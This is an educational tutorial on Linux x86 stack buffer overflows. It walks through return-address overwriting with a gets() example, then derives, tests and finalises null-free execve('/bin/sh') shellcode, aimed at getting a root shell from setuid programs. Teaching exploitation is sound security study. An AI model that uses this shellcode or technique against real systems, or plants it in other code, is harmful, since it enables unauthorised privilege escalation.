Although overflows are almost inevitable during program development, they pose a serious threat to the system. When an overflow occurs in a privileged program, an attacker can exploit the vulnerability to obtain the system's highest privilege, root. This article therefore introduces stack overflow techniques in detail.

Before you begin to study stack overflows, you should understand 32-bit x86 assembly language and the layout and function of the registers, and you must have basic knowledge of the stack and of storage allocation. Many computer books cover these topics, so I will only sketch the principles and focus on applications. You should also understand Linux, because the examples in this lecture are developed on Linux.

1. First, review the basic knowledge.

Physically, a stack is a contiguous region of memory. A program declares various variables. Static global variables are located in the data segment and are loaded when the program starts running. The program's dynamic local variables are allocated on the stack.

In terms of operation, the stack is a last-in, first-out (LIFO) structure. Its growth direction is opposite to that of memory: we define increasing memory addresses as up, so the stack grows down. A push performs ESP = ESP - 4, and a pop performs ESP = ESP + 4. In other words, an older value on the stack has a higher memory address than a newer one. Keep this in mind, because it is the theoretical basis of stack overflow.

During a function call, the following are pushed onto the stack in order: the parameters, the return address, and EBP. If the function has local variables, the corresponding space is then reserved on the stack to hold them. When the function finishes, the contents of these local variables are lost, but the memory is not cleared.
When the function returns, EBP is popped, restoring the stack to its state at the time of the call, and then the return address is popped into EIP so that the program continues executing. In C programs, parameters are pushed in reverse order. For example, for func(a, b, c) the parameters are pushed in the order c, b, a. When they are read back, because the stack is last in, first out, a is at the top of the stack, then b, and finally c. This is basic assembly-language knowledge, and you must understand it before you begin.

2. Now let's see what a stack overflow is.

Stack space is allocated at run time. A stack overflow means writing more data into a block on the stack than the block can hold, so that the data runs out of bounds and overwrites older stack data.

Example 1:
------------------------------------------------------------------------
#include <stdio.h>

int main()
{
    char name[8];
    printf("Please type your name: ");
    gets(name);
    printf("Hello, %s!", name);
    return 0;
}
------------------------------------------------------------------------
Compile and run it. Entering ipxodi prints Hello, ipxodi!. How does the stack behave while the program runs? When main starts, the return address and EBP are pushed onto the stack in turn. Using gcc -S to obtain the assembly output, we can see that main begins with the following instructions:
------------------------------------------------------------------------
pushl %ebp
movl %esp,%ebp
subl $8,%esp
------------------------------------------------------------------------
The first instruction saves EBP. EBP is then set to the current ESP, so that EBP can be used to access this function's local variables. After that, 8 is subtracted from ESP, that is, the stack grows by 8 bytes to hold the name[] array. Finally, main returns: the ret instruction pops the saved address into EIP, and the CPU continues with the instruction that EIP points to.

Now we run the program again, this time overflowing the stack.
After ipxodiAAAAAAAAAAAAAAA is entered and gets(name) executes, the name array cannot hold the input because the string is too long, so the extra 'A' characters are written toward higher memory addresses. Because the stack grows in the opposite direction to memory, these 'A's overwrite older elements of the stack. We find that both EBP and ret have been overwritten with 'A'. When main returns, the ASCII code of 'AAAA', 0x41414141, is used as the return address. The CPU tries to execute the instruction at 0x41414141 and the program faults. This is a stack overflow.

3. How to use a stack overflow

We have now produced a stack overflow. The principle can be summarized as follows: because string-handling functions (gets, strcpy, and so on) neither check nor limit writes past the end of an array, we can write beyond a character array, overwrite older elements on the stack, and thereby modify the return address. In the example above, this made the CPU fetch an instruction from an invalid address and fault. In fact, at the moment the stack overflows we completely control what the program does next. If we overwrite the return address with the address of real instructions, the CPU executes our instructions instead. On UNIX/Linux systems, our instructions can execute a shell, and that shell has the same privileges as the program whose stack we overflowed. If that program is setuid root, we get a root shell. The next section describes how to write shellcode.

How to write shellcode

I. Basic algorithm analysis of shellcode

In C, a program that starts a shell is written as follows:

shellcode.c
------------------------------------------------------------------------
#include <stdio.h>
#include <unistd.h>

int main()
{
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 0;
}
------------------------------------------------------------------------
The execve function executes a program.
It takes the address of the program name as its first parameter, a pointer array holding the program's argv[i] (with argv[n-1] = 0) as its second parameter, and (char *)0 as its third parameter.

Let's take a look at the assembly code of execve:
------------------------------------------------------------------------
[nkl10]$ gcc -o shellcode -static shellcode.c
[nkl10]$ gdb shellcode
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>:     pushl  %ebp
0x80002bd <__execve+1>:   movl   %esp,%ebp         ; the two instructions above are the function prologue
0x80002bf <__execve+3>:   pushl  %ebx              ; save ebx
0x80002c0 <__execve+4>:   movl   $0xb,%eax         ; eax = 0xb; eax holds the system call number
0x80002c5 <__execve+9>:   movl   0x8(%ebp),%ebx    ; ebp+8 is the first parameter, "/bin/sh\0"
0x80002c8 <__execve+12>:  movl   0xc(%ebp),%ecx    ; ebp+12 is the second parameter, the address of the name array
0x80002cb <__execve+15>:  movl   0x10(%ebp),%edx   ; ebp+16 is the third parameter, the null pointer
                                                   ; (the shellcode will pass the address of name[2-1], which holds NULL)
0x80002ce <__execve+18>:  int    $0x80             ; perform system call 0xb (execve)
0x80002d0 <__execve+20>:  movl   %eax,%edx         ; from here on the return value is processed; of no use to us
0x80002d2 <__execve+22>:  testl  %edx,%edx
0x80002d4 <__execve+24>:  jnl    0x80002e6 <__execve+42>
0x80002d6 <__execve+26>:  negl   %edx
0x80002d8 <__execve+28>:  pushl  %edx
0x80002d9 <__execve+29>:  call   0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>:  popl   %edx
0x80002df <__execve+35>:  movl   %edx,(%eax)
0x80002e1 <__execve+37>:  movl   $0xffffffff,%eax
0x80002e6 <__execve+42>:  popl   %ebx
0x80002e7 <__execve+43>:  movl   %ebp,%esp
0x80002e9 <__execve+45>:  popl   %ebp
0x80002ea <__execve+46>:  ret
0x80002eb <__execve+47>:  nop
End of assembler dump.
------------------------------------------------------------------------
From this analysis we obtain the following simplified algorithm:
------------------------------------------------------------------------
movl   $<execve system call number>,%eax
movl   <address of "/bin/sh\0">,%ebx
movl   <address of the name array>,%ecx
movl   <address of name[n-1]>,%edx
int    $0x80                               ; execve
------------------------------------------------------------------------
When execve succeeds, the shellcode program stops running and /bin/sh replaces it and continues to run. However, if execve fails (for example, because there is no /bin/sh file), the CPU goes on executing whatever instructions follow, with unpredictable results. Therefore an exit() system call must follow, to end the execution of shellcode.c.

Let's take a look at the assembly code of exit(0):
------------------------------------------------------------------------
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>:     pushl  %ebp
0x800034d <_exit+1>:   movl   %esp,%ebp
0x800034f <_exit+3>:   pushl  %ebx
0x8000350 <_exit+4>:   movl   $0x1,%eax              ; system call number 1
0x8000355 <_exit+9>:   movl   0x8(%ebp),%ebx         ; ebx = the parameter, 0
0x8000358 <_exit+12>:  int    $0x80                  ; trigger the system call
0x800035a <_exit+14>:  movl   0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>:  movl   %ebp,%esp
0x800035f <_exit+19>:  popl   %ebp
0x8000360 <_exit+20>:  ret
0x8000361 <_exit+21>:  nop
0x8000362 <_exit+22>:  nop
0x8000363 <_exit+23>:  nop
End of assembler dump.
------------------------------------------------------------------------
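The assembly code for exit(0) turns out to be simpler:
------------------------------------------------------------------------
movl   $0x1,%eax      ; system call number 1 (exit)
movl   $0x0,%ebx      ; ebx is the exit parameter, 0
int    $0x80          ; trigger the system call
------------------------------------------------------------------------
The merged assembly code is then:
------------------------------------------------------------------------
movl   $<execve system call number>,%eax
movl   <address of "/bin/sh\0">,%ebx
movl   <address of the name array>,%ecx
movl   <address of name[n-1]>,%edx
int    $0x80          ; perform the system call (execve)
movl   $0x1,%eax      ; system call number 1 (exit)
movl   $0x0,%ebx      ; ebx is the exit parameter, 0
int    $0x80          ; perform the system call (exit)
------------------------------------------------------------------------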
II. Implementing a shellcode

Now let's implement this algorithm. First, we need the string "/bin/sh" and a name array. We can construct them, but how does the shellcode know their addresses? The program is loaded dynamically each time, so the addresses of the string and of the name array are not fixed. Hackers solved this problem cleverly by combining jmp and call.
------------------------------------------------------------------------
jmp    offset-to-call                # 2 bytes
popl   %esi                          # 1 byte   popl retrieves the string address
movl   %esi,array-offset(%esi)       # 3 bytes  build the name array at string+8;
                                     #          name[0] holds the string address
movb   $0x0,nullbyteoffset(%esi)     # 4 bytes  store 0 at string+7 as the string terminator
movl   $0x0,null-offset(%esi)        # 7 bytes  store 0 in name[1]
movl   $0xb,%eax                     # 5 bytes  eax = 0xb is the execve syscall number
movl   %esi,%ebx                     # 2 bytes  ebx = address of the string
leal   array-offset(%esi),%ecx       # 3 bytes  ecx = start address of the name array
leal   null-offset(%esi),%edx        # 3 bytes  edx = address of name[1]
int    $0x80                         # 2 bytes  int 0x80 is the system call
movl   $0x1,%eax                     # 5 bytes  eax = 0x1 is the exit syscall number
movl   $0x0,%ebx                     # 5 bytes  ebx = 0 is the exit return value
int    $0x80                         # 2 bytes  int 0x80 is the system call
call   offset-to-popl                # 5 bytes  with the call placed here, the address of the
                                     #          string is pushed as the return address
/bin/sh string
------------------------------------------------------------------------
First, jmp uses a relative address to jump to the call. When the call instruction executes, the address of the string /bin/sh is pushed onto the stack as the call's return address. Execution then reaches popl %esi, which pops the address that was just pushed, giving the real address of the string. Next, a 0 is stored in the 8th byte of the string (string + 7) to terminate it, and the following 8 bytes are used to build the name array (two 4-byte pointers, eight bytes in total).
Now we can write the shellcode. Write the assembly source program first.

shellcodeasm.c
------------------------------------------------------------------------
void main() {
__asm__("
        jmp    0x2a                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1,%eax                # 5 bytes
        movl   $0x0,%ebx                # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2f                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes
");
}
------------------------------------------------------------------------
After compiling, use gdb's x/bx [address] command to obtain the hexadecimal representation.
Next, write the following test program (note that it is the basic harness for testing shellcode):
test.c
------------------------------------------------------------------------
char shellcode[] =
    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
    int *ret;
    ret = (int *)&ret + 2;     // ret now points at the return address of main()
                               // (+2 because of the pushl %ebp; otherwise +1 would do)
    (*ret) = (int)shellcode;   // change main()'s return address to the start address of shellcode
}
------------------------------------------------------------------------
------------------------------------------------------------------------
[nkl10]$ gcc -o test test.c
[nkl10]$ ./test
$ exit
[nkl10]$
------------------------------------------------------------------------
We store the shellcode in the shellcode array. When the return address ret of the program (test.c) is set to the start address of the shellcode array, the program executes our shellcode on return, so we get a shell. Running it produces the sh prompt $, which shows that a shell was opened successfully.

One point needs explaining here: we placed the shellcode in the data segment as a global variable, rather than in the code segment as a piece of code. Under the operating system, the contents of a program's code segment are read-only and cannot be modified. Instructions in our code such as movl %esi,0x8(%esi) modify part of the code itself, so it cannot be placed in the code segment.
Is this shellcode good enough? Unfortunately, not quite. Recall that the key to a stack overflow is writing past the end of a string array. However, string functions such as strcpy treat "\0" as the end of the string and stop writing when they reach it (gets stops at a newline instead). Our shellcode contains a large number of \0 bytes, so a copy through such a function would cut it short and the shellcode above is not usable. Our shellcode must not contain any \0 bytes.
Therefore, some instructions need to be replaced:

Old instructions               New instructions
--------------------------------------------------------
movb $0x0,0x7(%esi)            xorl %eax,%eax
movl $0x0,0xc(%esi)            movb %al,0x7(%esi)
                               movl %eax,0xc(%esi)
--------------------------------------------------------
movl $0xb,%eax                 movb $0xb,%al
--------------------------------------------------------
movl $0x1,%eax                 xorl %ebx,%ebx
movl $0x0,%ebx                 movl %ebx,%eax
                               inc %eax
--------------------------------------------------------
The final shellcode is:
------------------------------------------------------------------------
char shellcode[] =
    "\xeb\x1f"               /* 00: jmp 0x1f             */
    "\x5e"                   /* 02: popl %esi            */
    "\x89\x76\x08"           /* 03: movl %esi,0x8(%esi)  */
    "\x31\xc0"               /* 06: xorl %eax,%eax       */
    "\x88\x46\x07"           /* 08: movb %al,0x7(%esi)   */
    "\x89\x46\x0c"           /* 0b: movl %eax,0xc(%esi)  */
    "\xb0\x0b"               /* 0e: movb $0xb,%al        */
    "\x89\xf3"               /* 10: movl %esi,%ebx       */
    "\x8d\x4e\x08"           /* 12: leal 0x8(%esi),%ecx  */
    "\x8d\x56\x0c"           /* 15: leal 0xc(%esi),%edx  */
    "\xcd\x80"               /* 18: int $0x80            */
    "\x31\xdb"               /* 1a: xorl %ebx,%ebx       */
    "\x89\xd8"               /* 1c: movl %ebx,%eax       */
    "\x40"                   /* 1e: inc %eax             */
    "\xcd\x80"               /* 1f: int $0x80            */
    "\xe8\xdc\xff\xff\xff"   /* 21: call -0x24           */
    "/bin/sh"                /* 26: .string \"/bin/sh\"  */